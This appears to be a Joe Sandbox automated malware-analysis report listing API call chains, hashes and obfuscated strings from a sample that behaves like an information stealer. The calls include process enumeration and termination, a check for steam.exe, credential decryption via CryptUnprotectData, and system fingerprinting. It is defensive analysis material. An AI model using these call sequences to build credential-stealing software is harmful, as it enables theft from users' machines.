                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 94a73bf33c6dd1d27e40fad9afb5216b056867727f0313c9113e91272b2ad584
                                • Instruction ID: 349c981f40f94f8a8475662fb4942a2d727918eac58d93576d20ce4fe0aba0b5
                                • Opcode Fuzzy Hash: 94a73bf33c6dd1d27e40fad9afb5216b056867727f0313c9113e91272b2ad584
                                • Instruction Fuzzy Hash: DD415E316112198FCB32FF68DD89A9E77E4EF95314F04D134B95EA7212CB30AD05ABA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: /;3z$497r$@HzZ$J/?$V>7{$Vxn$cFk$k!K$zds$qE~
                                • API String ID: 0-3750487434
                                • Opcode ID: 5d7b0b4fc96bc8871111152462490e0df9b3111acce001ea7d0c5ed0cd9315c6
                                • Instruction ID: 2d9842df28c481f12e36d72306d92774351ef6ed9419e3dd79e914c9b0ea393e
                                • Opcode Fuzzy Hash: 5d7b0b4fc96bc8871111152462490e0df9b3111acce001ea7d0c5ed0cd9315c6
                                • Instruction Fuzzy Hash: CAB2F9F360C2049FE304AE2DEC8567ABBE9EF94720F16493DEAC4C7744EA3558058796
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00C946B9
                                • Process32First.KERNEL32(00000000,00000128), ref: 00C946C9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00C946DB
                                • StrCmpCA.SHLWAPI(?,?), ref: 00C946ED
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C94702
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C94711
                                • CloseHandle.KERNEL32(00000000), ref: 00C94718
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00C94726
                                • CloseHandle.KERNEL32(00000000), ref: 00C94731
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 72d364a2c731b004bb432be79d7ed60891a2352dd91e02ce094dd700027a6893
                                • Instruction ID: 09902b83dc80c60c9c10ef6594f2a2b751f3d6a9f5367e5249f207fc8831d040
                                • Opcode Fuzzy Hash: 72d364a2c731b004bb432be79d7ed60891a2352dd91e02ce094dd700027a6893
                                • Instruction Fuzzy Hash: A301A135601119AFEB205B62AC8CFFB377CAB4EB41F000098F905A5080EF74AA998B60
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0i^>$?US$Ad7|$KFJ|$`E:$bd='$fmo$ic[a$zmE
                                • API String ID: 0-3588367883
                                • Opcode ID: 80c830090ef885592898ed3cc8c92715222c5cbf36623775253930842356738d
                                • Instruction ID: b852b9a58368db66381a8c3a559bfa326e92a6c3e81509f73708a47fb73c73f6
                                • Opcode Fuzzy Hash: 80c830090ef885592898ed3cc8c92715222c5cbf36623775253930842356738d
                                • Instruction Fuzzy Hash: 0FA218F360C2009FE7046E2DEC85A7ABBE9EF94720F1A493DE6C5C7744E63598018696
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00C94628
                                • Process32First.KERNEL32(00000000,00000128), ref: 00C94638
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00C9464A
                                • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00C94660
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00C94672
                                • CloseHandle.KERNEL32(00000000), ref: 00C9467D
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                • String ID: steam.exe
                                • API String ID: 2284531361-2826358650
                                • Opcode ID: 1e1ae765b4c410976e7c9736cb8a5d2107543afacd06420d7ee4d730b66bf408
                                • Instruction ID: c45276cf1ed3642fb3abe7f85205afc02bda6db5f263b35e66911bbf1d6f39bc
                                • Opcode Fuzzy Hash: 1e1ae765b4c410976e7c9736cb8a5d2107543afacd06420d7ee4d730b66bf408
                                • Instruction Fuzzy Hash: 16014F716012289FDB209B61AC89FEB77BCEF0E750F0401D5F908E1141EB74AA998AE5
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C84B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C84B7F
                                • lstrlen.KERNEL32(00CA4CA8), ref: 00C84B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84BA7
                                • lstrcat.KERNEL32(00000000,00CA4CA8), ref: 00C84BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C84BFA
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID:
                                • API String ID: 2567437900-0
                                • Opcode ID: 485ce969d2d871506618eed89035ccb2b9987733b5889965250d0a66e86f6225
                                • Instruction ID: 0317ca0a45d042d5332a533d59ff5ce53de1e19e7c43f1ee802fde909bb94907
                                • Opcode Fuzzy Hash: 485ce969d2d871506618eed89035ccb2b9987733b5889965250d0a66e86f6225
                                • Instruction Fuzzy Hash: D4315E316215169BCB26FF68EC85EAE77F9EF95324F058134F81997212CB30ED05AB90
                                APIs
                                  • Part of subcall function 00C971E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00C971FE
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00C92D9B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C92DAD
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00C92DBA
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00C92DEC
                                • LocalFree.KERNEL32(00000000), ref: 00C92FCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 3ac1d477537e175d361b6eee08c87502b0f36ea7b2748c0631af9885fde65356
                                • Instruction ID: c9e227a672029895a5f947983f5bac2aeffe31c21bab9044a361093d21b88183
                                • Opcode Fuzzy Hash: 3ac1d477537e175d361b6eee08c87502b0f36ea7b2748c0631af9885fde65356
                                • Instruction Fuzzy Hash: 37B14C70901214DFCB14CF59C98CB95B7F1FB48315F29C1A9D458AB2A2D776AE86CF80
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: >i$TuO$_X~=$aawn$~l7?$~l7?$u\{
                                • API String ID: 0-215019335
                                • Opcode ID: 2d048d397bc585136fa7264eb9a67446e7bbb9f22e08a6190fd23661644843f9
                                • Instruction ID: 844198c2c214139eeee3d2252d9865c8b90821e1b501d457fa186606223228a2
                                • Opcode Fuzzy Hash: 2d048d397bc585136fa7264eb9a67446e7bbb9f22e08a6190fd23661644843f9
                                • Instruction Fuzzy Hash: 10B238F360C2049FE304AE2DEC8567AF7E9EF94720F16893DE6C5C3744EA3598058696
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: A$.`~$HT,\$Nt?^$Us/$`E:$i*<
                                • API String ID: 0-3280309051
                                • Opcode ID: 677e1bf2be0f132f6d53f8a17c1ab23f9e846597e11e453a3f0d9487e5062c38
                                • Instruction ID: ef4ecdc6805f6367f2f9f2cea934c65d71ce0062123fe87fde8061d6fdaccae1
                                • Opcode Fuzzy Hash: 677e1bf2be0f132f6d53f8a17c1ab23f9e846597e11e453a3f0d9487e5062c38
                                • Instruction Fuzzy Hash: 66B207F3A0C2049FE3046E2DEC8567ABBE9EF94320F1A893DE6C4C7744E67558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: :./$I\?o$Q~$$jR$nR$wuxp$/b;
                                • API String ID: 0-2325388087
                                • Opcode ID: 42b070f3d67430ae3f85095272f2564a023380537d7b4985385df7fa11545dc3
                                • Instruction ID: 608fe5683f1ff0bb7501eb1c32215fd229d0e172033e555b0f2d81b1b75f6e96
                                • Opcode Fuzzy Hash: 42b070f3d67430ae3f85095272f2564a023380537d7b4985385df7fa11545dc3
                                • Instruction Fuzzy Hash: 9DB23BF3A0C2009FE3046E2DEC8567AFBE9EF94720F1A493DEAC5C3744E97558058696
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: A-DI$bTvw$e__$7kn$Y&$no
                                • API String ID: 0-301546087
                                • Opcode ID: 979e2f840d4e01996f4c5413b837dcb40ad5454fe128282fd8e1ff92fae3d8b6
                                • Instruction ID: 729bb38ab196d650e9f6f7c198148bf3dd3db2c977fe26b8d5582b05adbcd5d2
                                • Opcode Fuzzy Hash: 979e2f840d4e01996f4c5413b837dcb40ad5454fe128282fd8e1ff92fae3d8b6
                                • Instruction Fuzzy Hash: 79B2D4F3A0C204AFE3046E29EC8567AFBE9EF94720F16493DE6C483744E63598458797
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00C92C42
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C92C49
                                • GetTimeZoneInformation.KERNEL32(?), ref: 00C92C58
                                • wsprintfA.USER32 ref: 00C92C83
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID: wwww
                                • API String ID: 3317088062-671953474
                                • Opcode ID: 2ec62c9511b3e6e881d31d46a22227c602ed094e82098b3c57c36748a5d4b6a4
                                • Instruction ID: 90a02d9ab99140ea40b15c0dc8e7c6c9520404554dfb6589b90a2864eaf663c7
                                • Opcode Fuzzy Hash: 2ec62c9511b3e6e881d31d46a22227c602ed094e82098b3c57c36748a5d4b6a4
                                • Instruction Fuzzy Hash: C601F771A40604BFDB188B59DC49B6AB769EB89721F008369F915DB2C0D774290486D1
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00C7775E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C77765
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C7778D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00C777AD
                                • LocalFree.KERNEL32(?), ref: 00C777B7
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 5cd1ad68695481f6d765ccaad381470586a8991b988d18140c1cd09eff925646
                                • Instruction ID: bdac8102c18cc7571be48dcd4905a42ce25e65ef169fe90cd8e2226c1e8b7f7e
                                • Opcode Fuzzy Hash: 5cd1ad68695481f6d765ccaad381470586a8991b988d18140c1cd09eff925646
                                • Instruction Fuzzy Hash: A5011E75B40308BFEB10DB959C4AFAA7B78EB49B51F108155FA09EB2C0D6B0A9048B90
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: IMk$U)/$`[ww$u?~
                                • API String ID: 0-1566643718
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "7[$;?Gw$C4z$OUy_
                                • API String ID: 0-4188494894
                                APIs
                                  • Part of subcall function 00C971E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00C971FE
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C93A96
                                • Process32First.KERNEL32(00000000,00000128), ref: 00C93AA9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00C93ABF
                                  • Part of subcall function 00C97310: lstrlen.KERNEL32(------,00C75BEB), ref: 00C9731B
                                  • Part of subcall function 00C97310: lstrcpy.KERNEL32(00000000), ref: 00C9733F
                                  • Part of subcall function 00C97310: lstrcat.KERNEL32(?,------), ref: 00C97349
                                  • Part of subcall function 00C97280: lstrcpy.KERNEL32(00000000), ref: 00C972AE
                                • CloseHandle.KERNEL32(00000000), ref: 00C93BF7
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00C7EA76
                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00C7EA7E
                                • lstrcat.KERNEL32(00C9CFEC,00C9CFEC), ref: 00C7EB27
                                • lstrcat.KERNEL32(00C9CFEC,00C9CFEC), ref: 00C7EB49
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                APIs
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 00C940CD
                                • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00C940DC
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C940E3
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00C94113
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptHeapString$AllocateProcess
                                • String ID:
                                • API String ID: 3825993179-0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,00C9A3D0,000000FF), ref: 00C92B8F
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00C92B96
                                • GetLocalTime.KERNEL32(?,?,00000000,00C9A3D0,000000FF), ref: 00C92BA2
                                • wsprintfA.USER32 ref: 00C92BCE
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                APIs
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00C79B3B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C79B4A
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00C79B61
                                • LocalFree.KERNEL32 ref: 00C79B70
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                APIs
                                • CoCreateInstance.COMBASE(00C9B110,00000000,00000001,00C9B100,?), ref: 00C8CB06
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00C8CB46
                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 00C8CBC9
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 1940255200-0
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C79B9F
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C79BB3
                                • LocalFree.KERNEL32(?), ref: 00C79BD7
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 7b4a3241b86f8d9a23b97dd91620fe246326791e3b8efb5faa48aab292ab350a
                                • Instruction ID: 6801dea46e209c87cbf0ee205512a5a1d04ecd3462deb9719559ffd1af847247
                                • Opcode Fuzzy Hash: 7b4a3241b86f8d9a23b97dd91620fe246326791e3b8efb5faa48aab292ab350a
                                • Instruction Fuzzy Hash: 06011275A413096FD7109BA4DC46FAFB778EB48700F108554EA04AB281D7B0AE04C7D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
